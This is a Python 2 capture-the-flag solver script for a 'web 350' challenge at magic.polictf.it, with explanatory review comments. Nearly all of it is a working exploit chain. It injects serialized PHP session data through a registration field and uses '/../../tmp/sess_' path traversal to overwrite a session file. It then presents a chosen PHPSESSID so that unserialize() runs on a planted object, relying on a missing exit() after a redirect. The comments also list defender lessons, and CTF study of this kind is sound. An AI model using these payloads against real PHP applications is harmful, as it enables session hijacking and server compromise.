web 350
# CTF solver for the "web 350" challenge hosted at magic.polictf.it.
# Python 2 script (print statements, raw_input); run as a whole, top to bottom.
#
# The chain, as described by the script's own comments (the PHP source is not
# on this page, so the server-side details are inferred from them):
#   1. the registration form stores a per-user record whose CONTENT comes from
#      the `name` field and whose PATH comes from the `surname` field, and the
#      login step rewrites that file ("active", fopen "w+");
#   2. pointing the path at /tmp/sess_<PHPSESSID> therefore lets the attacker
#      author the raw contents of a PHP session file, including a serialized
#      `Magic` object under `userObject`;
#   3. magic_things.php?logout=true with that PHPSESSID unserialize()s the
#      session; the isLogined() check fails and redirects, but execution does
#      not stop, so the result is still emitted in the 302 body.
#
# NOTE(review) — defender take-aways implied by the above (to be confirmed
# against the application code):
#   * a user-supplied field reaches a filesystem path unsanitised ("/../../"
#     traversal) — paths derived from input need a basename/allow-list check,
#     and application-writable storage must never overlap session.save_path;
#   * redirect-on-auth-failure without an exit() after the header is a
#     well-known PHP pitfall: every line after the redirect still runs for an
#     unauthenticated request;
#   * session contents are trusted as if server-written; once an attacker can
#     write them, unserialize() of a user object is the natural pivot.
import requests
import random
import string

URL = 'http://magic.polictf.it/'
# Throw-away username: 10 distinct ASCII letters, so len(name) == 10 and the
# `s:%d` length prefix in the serialized payload below is exact.
name = ''.join(random.sample(string.ascii_letters, 10))
# Attacker-chosen session id; the file written by stage 2 is /tmp/sess_<sessid>
# and stage 3 presents the same value as the PHPSESSID cookie.
sessid = 'trbfs2mbi41lmeg32439vu1gb4'

# Stage 1 is disabled (kept inside a string literal, not a comment): the
# author found that binding a real login to `sessid` is unnecessary because
# the unserialize() in stage 3 runs even when isLogined() fails.
'''
# 1. binding the user and session which make isLogged() checking in 'magic_things.php' passed.
# It does not needed.
# Because even if isLogined() check fail,
# it will still execute the rest of code which is include 'unserialize()'.
r = requests.post(
URL + 'index.php',
params = {'page': 'register'},
data = {
'name': name,
'surname': name,
'username': name,
'password': name,
'register': 'send'
}
)
print 'register', 'ok, now u can log in' in r.text
r = requests.post(
URL + 'index.php',
data = {
'username': name,
'password': name,
'login': 'login'
},
cookies = {
'PHPSESSID': sessid
}
)
print 'login', 'magic_things.php' in r.text
print r.text
print 'stage1 done'
raw_input()
'''

# 2. register a new user and let it login, and it will active and overwrite the log (our session file)
# (in active, fopen is "w+")
name2 = name + '_write'
r = requests.post(
    URL + 'index.php',
    data = {
        # inject session content
        # `s:0:""` is for fixing the user field
        # and inject { user: name, userObject: serialize(new Magic) }
        #
        # PHP session serialization is `key|<serialized value>`; the leading
        # `s:0:"";` presumably closes whatever the server prepends before our
        # data so that `user` and `userObject` parse as their own keys.
        # `O:5:"Magic":0:{}` is 16 bytes, matching the `s:16` prefix.
        'name': 's:0:"";user|s:%d:"%s";userObject|s:16:"O:5:"Magic":0:{}";' % (len(name), name),
        # surname becomes part of the storage path; the leading `/../../`
        # escapes the application's own directory and lands on the PHP
        # session file for `sessid` (assumes session.save_path is /tmp).
        'surname': '/../../tmp/sess_' + sessid,
        'username': name2,
        'password': name2,
        'register': 'send'
    }
)
print 'register', 'ok, now u can log in' in r.text

# login and write session !!!!!!
# Logging in as name2 triggers the "active" write (fopen "w+"), which is what
# actually puts the payload into /tmp/sess_<sessid>. No cookie is sent here:
# this request uses whatever session PHP assigns, not `sessid`.
r = requests.post(
    URL + 'index.php',
    data = {
        'username': name2,
        'password': name2,
        'login': 'login'
    }
)
print 'login', 'magic_things.php' in r.text
print 'stage2 done'

# 3. triger unserialize
# Present the planted session id; PHP loads /tmp/sess_<sessid>, so $_SESSION
# now carries the attacker-authored `userObject`.
r = requests.get(
    URL + 'magic_things.php',
    params = {'logout': 'true'},
    cookies = {
        'PHPSESSID': sessid
    },
    # because isLogined() check fail will redirect
    # but it will still execute unserialize and output result
    # we need that result
    # (allow_redirects=False keeps the 302 response itself, whose body holds
    # that output; following the redirect would discard it.)
    allow_redirects=False
)
# Raw body of the 302 response — presumably where the challenge output lands.
print r.text